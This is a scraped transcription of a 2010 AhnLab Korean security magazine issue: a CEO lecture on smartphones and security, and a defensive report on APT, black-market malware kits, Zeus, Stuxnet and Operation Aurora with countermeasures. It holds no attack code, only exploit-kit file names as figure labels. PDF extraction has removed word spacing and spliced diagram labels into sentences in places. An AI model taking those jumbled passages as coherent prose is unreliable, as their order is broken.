CEO 강연지상중계 변화의중심에서보안을생각하다 /11 변화의중심에서보안을생각하다 지난 9월 29일, 안철수연구소김홍선대표가서강대컴퓨터공학과, 전자공학과학생들을대상으로초청강연을펼쳤다. 이날강연에는공학전공자뿐만아니라인문학, 사회과학전공자들또한다수참여하여 IT와

Size: px
Start display at page:

Download "CEO 강연지상중계 변화의중심에서보안을생각하다 /11 변화의중심에서보안을생각하다 지난 9월 29일, 안철수연구소김홍선대표가서강대컴퓨터공학과, 전자공학과학생들을대상으로초청강연을펼쳤다. 이날강연에는공학전공자뿐만아니라인문학, 사회과학전공자들또한다수참여하여 IT와"

Transcription

1 월간安은안철수연구소에서발행하는보안분석정보매거진입니다 SPECIAL REPORT 되돌아보는 7^7 DDos 대란 /11 O C T O B E R / N O V E M B E R CEO 강연지상중계변화의중심에서보안을생각하다 Special Report 최악의악성코드심층분석및대응방안 1 부고도화된보안위협의생산 APT 2 부악성코드와의끝없는싸움 ARP Spoofing 3 부악성코드의새로운패러다임 Stuxnet 4 부전세계인터넷뱅킹의공포 ZeuS 세미나지상중계 : 보안관제고객세미나빠르게변화하는위협양상, 보안관리자는괴롭다? Solution Review 보안관제서비스의모든것! AhnLab Sefinity 꼼꼼하게뜯어보기 New Product 공공기관보안관리자김과장의고민은? Statistics 2010 년 9 월악성코드관련주요통계 AhnLab's Twitter What s happening? 1

2 CEO 강연지상중계 변화의중심에서보안을생각하다 /11 변화의중심에서보안을생각하다 지난 9월 29일, 안철수연구소김홍선대표가서강대컴퓨터공학과, 전자공학과학생들을대상으로초청강연을펼쳤다. 이날강연에는공학전공자뿐만아니라인문학, 사회과학전공자들또한다수참여하여 IT와보안에대한대학생들의관심을엿볼수있었다. ' 컨버전스시대의덕목 ' 이란주제로진행된이날강연은 IT와보안이슈뿐아니라스마트폰, 소셜네트워크등을자세히다루었다. 이글은안철수연구소김홍선대표님의서강대학교강연을지면으로옮긴것입니다. 미래의기술, 예측하기어려워누구나알다시피애플의혁신은가히혁명적이다. 아이폰을필두로한스마트폰보급은페이스북, 트위터등소셜네트워크서비스의활성화를불러왔다. 트위터의 CEO 는 ' 소셜네트워크가아니라인포메이션허브이다 ' 라고트위터에올린바있다. 이에전적으로동의한다. 이제까지는정보의양이많은것이미덕이라고생각했다. 그러나여기에반론을던진게트위터이다. 정보가많지만실제로필요한것은 140 자면충분하다고. 이것이커뮤니케이션패러다임을변화시키고있으며앞으로미디어등에많은영향을발휘할것이다. 커뮤니케이션패러다임의변화는세가지키워드 -스마트폰, 클라우드, 소셜네트워크 -로읽을수있다. 김대표는휴대전화개발에골몰하면서도누구나휴대폰을가지고다니는날이오게될줄은예상못했던과거를떠올리며, 기술이세상을어떻게바꾸어나갈수있는지와그중요성을역설했다. " 혹시집에수도꼭지가몇개나되는지알고있습니까? 70년대만하더라도두세가족이하나의수도를쓰는일이태반이었습니다. 하지만요즘에는사람수보다도많은수도꼭지를사용하고있습니다. 불과한세대만에일어난변화입니다. 우리가살고있는세상은빠르게변화하고있습니다. 변화의소용돌이한가운데에있다고해도과언이아닙니다." 로볼수있다고전하며이런구조에따라일게된대표적인커뮤니케이션의변화로페이스북, 트위터등소셜네트워크서비스 (SNS) 를꼽았다. 복잡해지는보안위협, 입체적대책필요이어서오늘날정보보안의동향과그대책에대한이야기가이어졌다. 인터넷은현대사회의기반인프라이며모든 PC는네트워크로연결되어있다. 인터넷서비스는비약적으로생성되고있으며이와비례하여보안위협또한점차조직화, 범죄화, 입체화, 글로벌화되어가고있다. 그래서보안은지식정보기반사회의핵심이라할수있다. 오늘날의보안은과거의보안과는판이하게달라졌다. 과거의악성코드가호기심및자기과시성을띠고있었다면, 오늘날에는더복잡해지고, 더고도화되고, 배포방법또한다양해져가고있다. 때문에필요한것은보다종합적인위협분석시스템이다. 한달에 100 만개가넘는악성코드샘플을일일이모두 김홍선대표는아이폰으로대표되는스마트폰이가져온혁신과소셜네트워크의확산, 클라우드기반으로의변화와컨버전스의개념을이어설명했다. 아이폰을위시한스마트폰의등장으로휴대폰제조업계의전통적인강자들이고전을면치못하는현상에대해, 이는과거수직적이던산업구조에서수평적구조로의변화 [ 그림 1] 주요 SNS 서비스의특징 2

3 대책을세워야하는진짜위협은무엇인가? 위협으로인해기업에발생가능한위험은무엇인가? [ 그림 2] 위협 (Threat) vs 위험 (Risk) 들여다보는것은불가능하다. 이제는네트워크에서분석해들어가는클라우드시스템으로처리하게된다. 날로다양해지는복합적인공격에는, 그에걸맞는입체적인대책이필요하다. 김홍선대표는웜, 바이러스, 스파이웨어의제거뿐만아니라네트워크불법접근및 HOSTS 변조의차단, 메모리해킹방지, 안티디버깅, 안티리버싱, 키보드입력보호등다각적이면서도핵심적인대응이요구되고있음을밝혔다. 야기할때예단적속성의 ' 위협 ' 과실제발생할수있는 ' 위험 ( 리스크 )' 을혼용하고있다는것이다. 김대표는해킹이가능하다는사실자체보다는기업및고객의정보가유출되거나 DDoS 공격을받을가능성이있는지의여부, 즉 ' 리스크의측면 ' 에서접근해야하며사용자에게 " 스마트폰은해킹당할수도있다더라 " 는막연한위험성을갖게하기보다는실제발생할수있는 ' 위협 ' 을올바르게인지할수있게해야함을강조했다. 스마트폰보안, 위협과위험구분해야스마트폰의산업구조와이와관련된보안이슈또한중요하게다루어졌다. 김홍선대표는스마트폰의개인정보유출및직접적인금전적손실을가져올수있는구조를설명하며분실, 악성코드감염등으로발생되는개인적손실부터금전적손실, 사업자에대한 DDoS 공격등사회적위협이일어날수있음을시사했다. 기존의시그니처 (signature) 기반의악성코드탐지에, 실제행위를살펴보고악성코드의유무를판별하는행위기반탐지의필요성도다루어졌다. 특히아이폰의경우애플앱스토어에서제공하는애플리케이션만다운로드할수있는정상단말기에서는악성코드작동가능성이매우낮지만안드로이드애플리케이션 (Android Application) 은특별한검증절차가미약하기때문에악의적애플리케이션의예방도중요하다고밝혔다. 이와관련해김홍선대표가특히강조한것은위협 (Threat) 과위험 (Risk) 의구분이었다. 스마트폰의구조상 PC단위에서일어날수있는모든상황이발생할수있음은사실이나사람들은스마트폰과보안을이 컨버전스시대에우리가생각해야하는것들김홍선대표는빠르게변화하는시대에필요한셀프리더십 (Self- Leadership) 에대한메시지도전했다. 기술력과창의력, 지식이새로운비즈니스의핵심자원으로떠오르는산업패러다임의전환시대에서는자신의가치를창출하는사람이되어야한다는것이다. 그러기위해서 ' 자신만의강점을찾을것 ', ' 자기자신에게투자를아끼지말것 ' 등을강조하며기업 CEO 로서뿐아니라인생의선배로서의조언도아끼지않았다. 지금우리는변화의한가운데에서있다. 이는어느한요소의변화가아닌, 사회전체의패러다임이변하고있다는의미다. 변화의소용돌이에서파생되는갖가지사안에알맞게대응하기위해서는 ' 보안 ' 이좀더적극적일필요가있다. 플랫폼에완연히스며듬과동시에투명하고측정가능하며, 신뢰할수있는플랫폼을만드는데온노력을다할필요가있다. 그것이모바일인터넷과컨버전스 ( 융합 ) 의시대를살아가는우리가고려해야할요점이다. 3

4 SPECIAL REPORT 최악의악성코드심층분석및대응방안 / 고도화된보안위협의생산, APT 18세기에서 19세기의영국에서는산업계전반에걸친커다란변화와변혁의시기를맞이하게되었으며이시기에발생하였던산업기술의커다란발전은후에영국의경제학자아놀드토인비 (Arnold Toynbe) 에의해산업혁명 (Industrial Revolution) 이라고불리게되었다. 이러한산업혁명에의해전세계적으로산업구조는조직적이고대량생산체계를갖출수있게됨으로써인류는풍요로운문명의발전을이루게되었다. 산업혁명시기에발생하였던일련의기술발전현상들은현재인터넷 (Internet) 을중심으로발생하고있는다양한보안위협들의발생과정들과유사한모습을많이가지고있다. 금전적이윤을목적으로가지고조직적으로자동화된대량생산방식으로만들어지는보안위협들에맞서는정보보호분야에있어서또다른산업혁명의시기로볼수있을것이다. 그러나최근에와서는금전적이윤을목적으로조직적이고자동화된대량생산형태의보안위협들은이제그범위를서서히확장하여또다른영역으로의발전을꾀하고있는실정이다. 이러한새로운형태의보안위협들에대해정보보호분야에서는 APT(Advanced Persistent Threat) 라고언급하고있다. 사이버블랙마켓 (Black Market) 에서발생하는산업혁명 최근인터넷을통해발생하는다양한보안위협들은이미몇년 에걸쳐금전적인이윤을목적으로제작되고있다는것은잘알 려져있는사실이다. 이러한금전적인이윤을획득하는것만을 목적으로하는것에그치지않고발생하는금전적인이윤을극대 화하기위해조직적인움직임까지보이고있으며실제중국언더 그라운드에서제작되는온라인게임사용자정보의탈취를시도 하는악성코드들의경우철저한역할분담형태로제작되고있어 조직적인모습을그대로보이고있다. 그세부적인역할분담형 태를살펴보게되면악성코드를제작하고제작된악성코드를유 포해서악성코드에감염된온라인게임의사용자들의개인정보 수집하고이를다시현금화하는일련의프로세스는단계적으로 철저하게조직적인역할분담형태로구성되어움직이고있다. 이렇게금전적인이윤을극대화하기위해조직적인역할분담형 태로보안위협을생산하는조직들의모습은과거발생하였던일 련의보안위협형태들로구분지었을때다음과같은특징들을 보이고있다. 1. 투자수익율 (ROI, Return of Investment) 중심의자동화된보안위협생산 보안위협을생산하는조직들은금전적인이윤을극대화하기위 한필요성에의해개인적인위협의제작차원에서조직적인역할 분담형태로변하게되었다. 이러한필요성에의해조직적인형 태를가지게되었으므로조직적인차원에서는보안위협의생산 에필요한금전적, 인력적투자는최소화하고생산하는보안위 협들은목적을최대한많이달성하기위해다양한방안들을사용 하고있다. 이러한형태의대표적인사례로악성코드들의대량으 로자동화된생산형태를들수있다. 사이버블랙마켓 악성코드제작자 악성코드판매 사이버마켓 온라인게임계정정보수집가 온라인게임아이템탈취자 온라인게임아이템판매자 온라인게임사용자 웹사이트크래커 웹사이트제공 온라인게임계정정보판매 온라인게임아이템판매 온라인게임아이템판매 [ 그림 1] 중국사이버블랙마켓의조직적인온라인게임개인정보탈취및아이템판매 4

5 이렇게웹사이트와악성코드가결합된대규모유포방식으로인해악성코드와같은보안위협에더욱많은사람들이단기간에노출되도록함으로써금전적인이윤역시극대화할수있는기회역시더욱커지게되었다. [ 그림 2] 중국사이버마켓에서판매되는온라인게임악성코드자동생성기 2. 다양한보안위협들을동시에생산하여금전적가치극대화 금전적인이윤을목적으로구성된조직들에서는한가지형태의 index.php 다른파일들호출 보안위협만을생산하는것이아니라다양한형태의보안위협들 을복합적으로생산하고있다. 실례로 2010 년 2 월발생한페이스 북 (Facebook) 피싱 (Phishing) 메일의경우, 유포된피싱메일은허 위로제작된피싱웹사이트로연결하게되는데그연결된웹사 1 단계 기본설정지역정보함수정의 geoip.php functions.php expl_ie6_adodb.php 이트에서는백그라운드 (Backgroud) 로사용자모르게원격제어와 개인정보탈취를목적으로제작된악성코드가유포되고있었다. 이러한점은피싱이라는보안위협과함께악성코드라는보안위 2 단계 방문기록공격코드생성 hit.php exploits.php expl_ie6_mdac.php expl_ie6.php expl_ie7.php expl_ie.php 협을동시에제작하여두가지보안위협에모두노출되는기회 를만들게됨으로써해당보안위협들로인해발생할수있는 3 단계 에러페이지생성 404.php expl_o7.php expl_o9.php 금전적인이윤역시극대화하고자하였던시도라고볼수있다. 3. 자동화로생산된보안위협들의웹사이트를중심으로대규모유포 [ 그림 3] 웹익스플로잇툴킷의한종류인 SEO SPLOIT PACK 과자동화된공격구조 금전적인이윤을극대화하기위해서자동으로생산되는보안위 협들을많은사람들이방문하는웹사이트를중심으로대규모로유포할수있는환경을만들수있게되었다. 이렇게보안위협들의대규모유포는자동화된 SQL 인젝션 (Injection) 과같은기법들과함께웹사이트에존재하는취약점을악용함으로써가능해지게되었다. 이러한대규모유포의좋은사례로는 2009 년 5월과 6월에발생하였던검블러 (Gumblar) 와나인볼 (NineBall) 이라명명된대규모웹사이트해킹및악성코드유포를들수가있다. 그와같이명명된대규모로악성코드유포된보안사고는웹익스플로잇툴킷 (Web Exploit Toolkit) 이라는접속하는웹브라우저에존재하는취약점을자동으로악용할수있게해주는공격도구형태로인해대규모유포의가능성을더욱크게만들게되었다. 고도화된보안위협 APT 의발생과특징앞서사이버블랙마켓에서발생하는다양한보안위협들을생산하는조직들이금전적인목적을가지고조직적이고자동화된방식으로보안위협들을대규모유포하는특징들을보이고있는것을언급하였다. 이러한금전적인목적을가진조직들에서생산하는보안위협들은여전히인터넷에서주요한정보보호분야의주제이다. 그러나 2010 년으로넘어오면서정보보호분야는앞서언급하였던금전적인이윤을목적으로하는보안위협들과다른목적과대상으로생산되는새로운형태의보안위협을정의하게되었는데 APT(Advanced Persistent Threat) 가바로그러한형태이다. 5

6 1. 고도화된보안위협 APT 의의미 APT 라는단어자체는 2010 년에들어새롭게정의된단어와의미는아니며그기원과최초의사용은미국공군사령부로연결된다. 미국공군사령부에서는 2006 년무렵미국국방부및정부기관들과의원활한커뮤니케이션을위해확인된특정보안위협의형태를지칭하는의미로서 APT(Advanced Persistent Threat) 를사용하게되었다. 그이후정보보호분야의민간부분으로넘어오면서 APT 라는용어는미국공군사령부에서사용되었던의미와조금다른형태로의미로해석되고사용하게되었다. APT(Advanced Persistent Threat) 이가지는개별적인단어들의의미와함께현재발생하는보안위협의특성들이합쳐져 2006 년미국공군사령부에서사용하던 APT 의미에서변형된다른의미가성립하게되었다. 이렇게성립된 APT 가가지는의미를요약하여정의해본다면다음과같다고할수있다. 다양한 IT 기술과방식들을이용해조직적으로경제적이거나정치적인목적을위해다양한보안위협들을생산해지속적으로특정대상에게가하는일련의행위 Advanced 사전적인의미로는 ' 앞선 ', ' 고급의 ' 로정의되고있으나 APT 에서 'Advanced' 라는단어는 APT 형태의보안위협을생산하는조직에서사용하는기술적인범위와수준을지칭하는것으로해석할 수있다. APT 형태의보안위협을생산하는조직은특정한목적을수행하기위해보안위협제작에사용되는기술들을한가지에만제한시키는것이아니라광범위하게많은기술들을동시에사용할수있다. 간단한예시로 APT 형태의보안위협을생산하기위해마이크로소프트 (Microsoft) 의윈도우 (Windows) 운영체제를깊이있게분석하여새로운제로데이 (Zero-Day, 0-Day) 취약점을찾아내어악용할수도있으며, 특정조직의내부시스템을장악하기위한목적으로기존보안소프트웨어에서탐지를회피할수있는새로운형태의악성코드를제작하는것을들수가있다. 결국특정목적을달성하기위해보안위협을생산하는조직은 IT 인프라와관련된모든기술들을다양하게사용할수도있다라는의미로해석할수있다. Persistent APT 의두번째단어에해당하는 'Persistent' 는사전적인의미로 ' 영속하는 ', ' 끊임없는 ' 으로정의되어있다. APT 에있어서이 'Persistent' 라는의미는보안위협을생산하는조직이가지고있는특정목적을대하는자세또는공격대상에대한태도로해석할수있다. 이는보안위협을생산하는조직이가지고있는특정목적이달성되기전까지는그공격대상에게끊임없이새로운기술과방식이적용된공격들이지속적으로가해지기때문이다. 이러한특징으로인해 APT 형태의보안위협을논하는정보보호분야에서는이 'Persistent' 적인특성으로인해그보안위협의목표가되는대상에게는치명적인손상을가하게된다고보고있다. Threat APT 에서의미하는 'Threat' 은사전적인의미의 ' 위협 ' 을그대로뜻한다. 그리고여기서이야기하는위협의구체적인형태로는악성코드, 취약점, 해킹과사회공학기법등으로 IT 기술에의해생산되는형태가될수도있으며사람에의해직접적으로만들어지는사회공학기법적인형태가될수도있다. 이렇게 2. APT 형태를가지는보안위협들의공격대상 앞서 APT 가가지고있는개별단어들의사전적인의미와특징들 을통해 APT 가어떠한의미라는것을살펴보았다. 이의미중에 서우리가주의깊게살펴보아야할부분이바로 ' 경제적이거나 정치적인목적 ' 그리고 ' 특정대상 ' 이라는부분이다. 특히앞서정 의한 APT 형태의보안위협에있어그위협의대상은보안위협 을생산해내는조직이가지고있는목적들과밀접한관련이있 으며그목적에따라그대상역시다양하게나타나고있다. 현 재까지발생하였던 APT 형태의보안위협들의공격대상이되었 던대상들을형태별로구분하여살펴보면크게다음 [ 그림 4] 와 같이분류가가능하다. APT 형태의보안위협에대상이되는조 직들은정부기관, 사회기간산업시설, 정보통신기업, 제조업 종기업과금융업종기업들과같은기관과기업들이주요대상 이되고있다. 이러한기관과기업들이 APT 형태의보안위협에 주요대상이된다는점은결국해당보안위협을생산하는조직 들이가지고있는목적자체가정치적인목적이상반되는조직에 정부기관 사회기간산업시설 정보통신기업 제조업종기업 금융업종기업 정부내기밀문서탈취군사기밀문서탈취 [ 그림 4] APT 형태의보안위협에대상이되는조직들 사이버테러리즘활동사회기간산업시스템의동작불능 기업지적자산탈취기업영업비밀탈취 기업지적자산탈취기업영업비밀탈취 사회금융시스템의동작불능기업금융자산정보탈취 6

7 위험성 취미및장난형태위협 취미와장난을목적으로하는위협 조직범죄형태위협 범죄적인요소포함조직적인구조로위협생산금전적인목적으로위협생산개인정보및금융정보탈취 산업스파이형태위협 경제적인목적으로위협생산지적자산및기업기밀탈취 APT (Advanced Persistent Threat) 지속적이고정교적인타겟공격정부, 기업및정치단체를대상정치적또는경제적목적으로위협생산경제적, 조직적지원을바탕 보안위협의정교함 [ 그림 5] APT 형태의보안위협이가지는정교함과위험성의상관관계 대한정치적인행동또는경제적으로커다란이익을확보할수있는데이터탈취가가능한기업이된다는것을알수있다. 이러한목적들중에서먼저정치적인목적의경우에는일반적으로정부기관과사회기간산업시설이 APT 형태의보안위협에주요공격대상이되고있다. 정부기관을대상으로하는경우에는생산한 APT 형태의보안위협을이용해국가정부기관에서보관중인특정기밀문서를탈취하거나특정정부정책과관련된정보들을확보하기위해서이다. 또한사회기간산업시설을대상으로하는경우에는일종의사이버테러리즘활동으로볼수도있다. 발전소및댐과같이사회운영의근간이되는기간산업시설에대해 APT 형태의보안위협으로공격을가하는것은해당산업시설들의정상적인동작을방해하여해당국가사회전반의정상적인활동이이루어지지않도록하기위해서라고볼수있다. 그리고경제적인목적이되는경우에는일반적인기업들이대상이되고있으며그중에서도소프트웨어나통신장비등을생산하는첨단정보통신기업들과함께자동차, 선박, 가전제품등을생산하는제조업종의기업들도대상이되고있다. 그리고은행, 증권사등금융업종에포함되는기업들도역시 APT 형태의보안위협들의대상이되고있다. 이러한일반적인기업들이대상이되는경우에는일반적으로산업보안 (Industrial Security, Corporate Security) 분야에서언급하고있는주된위협인산업스파이 (Corporate Espionage) 활동의일종으로주로경쟁기업내부의주요소프트웨어소스코드, 제품의설계도등을탈취하여경쟁기업의제품생산과판매에치명적인손상을가해반사적인이익을얻기위한경제적인목적이가장크다고할수있다. 금융업종기업의경우에는경쟁기업의내부재무관련기밀이나비공개투자계획문서등을탈취하여경쟁기업의비즈니스활동전반에걸친타격을주기위한목적도가지고있다. 다. 이러한목적역시시대에따라변하여왔던것을시대에따른공격대상의변화들로미루어알수가있다 년대에는주로국방부와같은군사기관들이주된대상이되었으며 2000 년대초반에이르러서는주로정부기관들이대상이되었다. 그리고 2000 년대중반에는일반기업들로그범위가확대되었으며그중에서도제조업종에속해있는기업들이주요타깃이었다 년대후반에이르러서는정보통신기술의발전과함께정보통신기업들이 APT 형태의보안위협에대상이되고있다. 이렇게시대적인상황에따라 APT 형태의보안위협이목표로하는공격대상들역시변화하는특징도있었지만이와함께과거에제작되었던보안위협들과다르게 APT 형태의보안위협에서만볼수있는정교함이존재하고있다. 개별적인보안위협의정교함은해당보안위협이발생하였던시대적인흐름과변화에따라조금씩다르다는특징을가지고있다. 이러한시대적인흐름에맞물리는보안위협의특징은과거에발견되었던보안위협들중에서도악성코드의경우에는대부분이제작자들의개인적인호기심또는자신이가지고있는기술에대한과시를위한성격, 그리고취미생활과같은장난에가까운성격을가지고있었다. 그러므로이러한목적을가지고있는보안위협의형태들은그정교함역시낮으며그로인해발생할수있는위험성역시그리 3. 고도화된보안위협 APT 형태가가지는보안위협적특성 앞서살펴본바와같이 APT 형태를가지는보안위협들의공 격대상들은그위협들을생산하는조직의목적에따라서다르 [ 그림 6] 블랙마켓에서금전거래로판매되는제우스봇생성기 7

8 [ 그림 7] 오퍼레이션오로라로불렸던보안사고 ( 출처 : McAfee) 높지않다고할수있다. 이러한형태의보안위협들로는 2004 년발견된베이글 (Bagle) 웜과 2006 년발견되었던마이둠 (Mydoom) 웜그리고넷스카이 (Netsky) 웜등을들수가있다. 이중에서도특히마이둠웜과넷스카이웜은제작자간의감정적인싸움으로인해지속적인변형들이제작되기도하였다. 그러나 2000 년에접어들면서금전적인목적으로조직적보안위협을생산하는단계에이르러서는생산되는보안위협들역시그정교함이서서히높아지게되었다. 이러한목적으로제작되는보안위협들은사이버범죄에도해당되지만이와연계되어있는물리적공간에서의조직적범죄에도자리하게되었다. 그리고이러한보안위협들의주된탈취의대상이되는것들은물리적인공간에서현금화가가능하거나재화로서금전적인가치를인정받을수있는온라인게임아이템, 개인신상정보, 금융정보그리고신용카드정보등과같은데이터들이해당된다. 이러한보안위협의형태들중에서가장대표적인사례로는 2008 년말부터제작되기시작하 여 2009 년 6월무렵부터는한국으로도유입되기시작하였던제우스 (Zeus) 봇 (Bot) 을들수가있다. 악성코드생성기와이를조정할수있는 C&C(Command and Control) 서버를설치할수있는제우스패키지는사이버블랙마켓 (Black Market) 에서유료로판매되고있다. 이렇게유료로판매되고있는제우스의패키지를이용하여온라인뱅킹의개인정보들을탈취하여은행계좌가가지고있는금액을모두탈취하거나제우스봇에감염된시스템들의정보들을블랙마켓에유료로재판매하고있다. 조직적으로금전적인목적의보안위협을생산하는현상들은그이후에도계속되고있으며이제는그규모면에서경제적으로가치가높은데이터들을탈취하는산업스파이적인형태로발전하게되었다. 이러한형태로발전함에따라일반인들과비교하여보안이견고한기업내부네트워크에침입하기위해생산되는보안위협들역시그정교함이높아짐과동시에그위험성역시더높아지게되었다. 이러한산업스파이적인형태로첨단정보통신기업들을대상으로하였던보안위협의좋은사례로는 2010 년 1월오퍼레이션오로라 (Operation Aurora) 또는구글해킹이라고도불렸던보안사고이다. 해당보안사고는규모가큰첨단정보통신기업들인구글 (Google) 등을대상으로해당기업들이가지고있는소프트웨어의소스코드와같은기업중요데이터를탈취할목적으로이루어졌다. 이과정에서마이크로소프트의인터넷익스플로러 (Internet Explorer) 제로데이 (Zero Day) 취약점이었던 MS 이사회공학기법과함께악용되었으며안티바이러스 (Anti- Virus) 소프트웨어에서도탐지되지않도록하기위해특별히제작된원격제어형태의악성코드도함께발견되었다. 이러한일련의과정들을살펴보면, 첨단정보통신기업들을대상으로공격을수행하였던조직은기업내부의기밀데이터를탈취하기위해별도의특수하게제작된제로데이취약점과악성코드를사용하 5 공격명령생성 Attacker C&C 서버 2 감염시스템정보전송 6 공격명령전송 index.php?data=66a54e2 7 관리자의 PLC 제어명령생성 8 PLC 제어명령변조 9 Target 공격 10 산업장비감염설비제어장애발생 1 USB 를통한감염 개인 PC WinCC/STEP7 PLC 제어 PC 3 내부네트워크감염 Zero Day Attack 공유폴더, 오토런 MS08-064, 046, 공격명령 Share RPC 서버통신 내부시스템 [ 그림 8] 스턱스넷악성코드의감염과동작원리 8

9 였다. 이러한점은기존의금전적인목적을가지고있는조직들과는그기술적인정교함에있어서한차원더높다고것을입증하는것이다. APT 형태의보안위협에대한가장대표적인사례로는올해 7월에발견된스턱스넷 (Stuxnet) 을들수가있다. 스턱스넷의경우해당악성코드의제작목적자체가사회기간산업시설중하나인원자력발전소의 SCADA(Supervisory Control And Data Acquisition) 시스템들을임의로제어하기위해서이다. 그리고해당악성코드를원자력발전소내부폐쇄망에서다른시스템들로유포시키기위해기존에알려진 MS 취약점과함께 4개의새로운제로데이취약점을사용할정도로고도의기술들이사용되었다. 그리고해당악성코드의설계적인측면에서도원자력발전소내부에서사용하는지멘스 (Siemens) 소프트웨어의구조를정확하게파악하여관련파일을변조한다는점들을볼때 APT 보안위협의형태가가지고있는특징들이그대로드러난다고볼수있다. 이러한모습들을보았을때, 결국스턱스넷은장기간에걸친철저한계획과준비를통해조직적으로악성코드에서사용될제로데이취약점개발과지멘스소프트웨어분석그리고악성코드설계라는분업화된형태로진행되었을것으로예측할수가있다. 그리고스턱스넷의유포를위해서사회공학기법을포함한다양한방법들을동원해내부폐쇄망으로옮겨갈수있도록장시간에걸쳐논리적, 물리적보안시스템들을교묘히회피하였을것으로보인다. APT 형태의보안위협에위한대응방안앞서우리는 APT 형태의보안위협들이가지는의미와그것들이가지는고도의정교함과높은위험성들이어떠한형태로사용되었는지를대표적인몇가지사례들을통해살펴볼수가있었다. 그렇다면이러한커다란위험성을가지고있는 APT 형태의보안위협들에대응하기위해어떠한대응수단과전략을갖추어야할것인가하는생각을할수있을것이다. APT 형태의보안위협에대응하기위해서는 [ 그림 9] 와같이크게사고예방차원에서취할수있는방안들과실제위협으로인한보안사고가발생한단 계에서취할수있는방안들로나누어볼수있다. 먼저실제위협발생전단계에서는일반적으로사전예방차원에서의활동들이주를이루고있다. 이러한활동으로는정기적인보안관제로기업내부네트워크에서침해사고로간주할수있는이상징후들이발생하는지주의깊은모니터링이필요하다. 그리고기업내부에서현재사용하고있는보안정책들의실효성에대해검토함과동시에각각의시스템들이보관하고있는데이터들의중요성과기밀성에따른위험성분석을수행하여보안사고가발생하더라도그피해를최소화할수있는방안을수립하는것이중요하다. 앞서살펴본바와같이 APT 형태의보안위협들에서는그목적을달성하기위한하나의수단으로서악성코드가제작되어사용된다고언급한바있다. 그러므로모든시스템과클라이언트에는보안소프트웨어를설치하여운영하도록하며주기적으로운영되고있는보안소프트웨어와보안장비의업데이트및관리를하는것이중요하다. 그리고기업내부네트워크를사용하는임직원들을대상으로정기적인보안인식교육을실시하여사회공학기법을악용하는다양한형태의보안위협들에노출되는것을예방할수있도록한다. 위협발생전의단계가침해사고예방적인관점에서의접근이었다면실제 APT 형태의위협이발생한것을인지하였거나유사한형태의보안사고가발생한것으로간주할경우크게 3가지형태로나누어서접근할필요가있다. 첫번째, 기업내부네트워크의시스템들에악성코드가감염되는것을막도록한다. 이를위해기업내부에서검토하고인증한애플리케이션들을대상으로화이트리스트 (White List) 를작성하여해당애플리케이션들외에임의로다른애플리케이션들을설치하지못하도록보안소프트웨어나시스템보안정책을이용하여설치및실행되지않도록차단한다. 그리고중요시스템들에서는확인되지않거나인가되지않은계정들의접근권한을최소화하거나차단하고네트워크역시중요시스템들이있는네트워크대역과일반임직원들이사용하는네트워크대역을분리및차단하여원천적인접근을차단하는것도방안이다. 위협예방전략수립 보안관제수행위험분석수행보안전략유효성분석 데이터유출예방 중요데이터보호중요데이터유출예방 위협탐지와대응 호스트및네트워크이상징후탐지침해사고대응프로세스수행침해사고포렌식프로세스수행 악성코드유입최소화 보안인식교육수행지속적보안업데이트관리보안소프트웨어설치및운영 위협발생전 위협발생상황 APT 형태보안위협 악성코드감염예방 어플리케이션화이트리스트접근권한의최소화네트워크접근제한및분리신원확인및접근권한관리 [ 그림 9] 스턱스넷악성코드의감염과동작원리 9

10 두번째, APT 형태의보안위협들이최종적으로시도하는형태는데이터의파괴나탈취라는것을앞서살펴보았다. 그러므로실제위협이발생한것으로파악되는상황이라면기업내부기밀데이터가보관중인시스템과데이터를보호할수있도록데이터암호화와접근통제로유출차단과함께기밀데이터가유출되었더라도그것을악용할수없도록하는것이중요하다. 세번째, 실제보안위협이어떠한경로로기업내부네트워크로침입을하였으며어떠한시스템과데이터에대해접근을시도하고있는지파악하는과정이필요하다. 이러한탐지및대응의단계에는최초네트워크내부의비정상적인패킷의검출과함께비정상적인접근이나데이터전송이발생하는시스템을파악하여침해사고대응프로세스를진행과함께디지털포렌식 (Digital Forensic) 프로세스에따라자세한분석을진행하도록한다. 결론우리는이제까지현재정보보호분야에서발생하고있는조직적으로금전적인이윤을목적으로생산되는보안위협들의특징과형태들을살펴보았다. 이러한보안위협들은이제 APT 라는경제적이거나정치적인더큰목적으로의보안위협들을생산하는단계에이르렀다. 과거에발생하였던사례들과의비교를통해 APT 형태의보안위협들이가지는기술적고도화와정교함은그위험성이더높은것을알수있었다. 이렇게과거에비해현저히높 아진위험성을내포하고있는 APT 형태의보안위협들에대해대응하기위해서는보안소프트웨어나보안장비들에만의존하는단층적인 (One Layer) 방안은그실효성을거두기가어렵다. 그리고이와함께기업내부네트워크에있는시스템과중요데이터가보관되어있는시스템들에매일접근하는임직원들에대한정기적인보안인식교육부재는내부네트워크에언제라도보안위협을유발시킬수있는큰문제점으로작용할수있다. 결국이러한고도화된보안위협들에대응하기위해서는효율적인보안소프트웨어및보안장비사용그리고중요시스템과데이터에대한접근차단등과같은기술적인보안에더해정기적인보안인식교육그리고시스템사용에대한명문화된보안지침등과같은정책적인보안이상호보완해주는구조로정보보호프로세스가확립되어야지만개별적인대응방안들이계층적인구조인다단계적인대응방안 (Defense in Depth) 으로재편성이가능하다. 현재뚜렷하게들어난 APT 형태의보안위협은스턱스넷이대표적이지만현재에도이러한형태의보안위협을계속되고있을것이며향후에는이보다더정교하고고도화된 APT 형태의보안위협들일생산될가능성이높다. 그러므로이러한형태의보안위협에대해충분한이해를바탕으로수립된정보보호프로세스만이실제보안사고가발생하더라도능동적으로대응을할수있을것으로생각된다. 참고문헌 1. Cybercrime industry has automated itself to improve efficiency, scalability, and profitability - Amichai Shulman, CTO of Imperva. (2010) 2. Advanced Persistent Threats (APTs) Damballa. (2010) 3. Advanced Persistent Threat (APT) Eric Cole, CTO of McAfee (2010) 4. Understanding the advanced persistent threat Richard Bejtlich, Director of Incident Response for General Electric. (2010) 5. Advanced Persistent Threats M86 Security (2010) 6. Countering cyber attacks Ernst & Young (2010) 7. Protecting Your Critical Assets Lessons Learned from Operation Aurora McAfee (2010) 8. Studying Malicious Websites and the Underground Economy on the Chinese web Jianwei Zhuge, Thorsten Holz, Chengyu Song, Jinpeng Guo, Xinhui Han, and Wei Zou, Peking University Institue of Computer Science and Technology Beijing, China, University of Mannheim Laboratory for Dependable Distributed Systems Mannheim, Germany (2007) 9. Crimeware Understanding New Attacks and Defenses Jakobsson, Ramzan, Symantec Press. (2008) 10. Cyber Fraud Tactics, Techniques, and Procedures Graham, Howard, Thomas, Winterfeld, CRC Press (2009) 11. AhnLab ASEC Threat Research blog ( 12. AhnLab ASEC Report 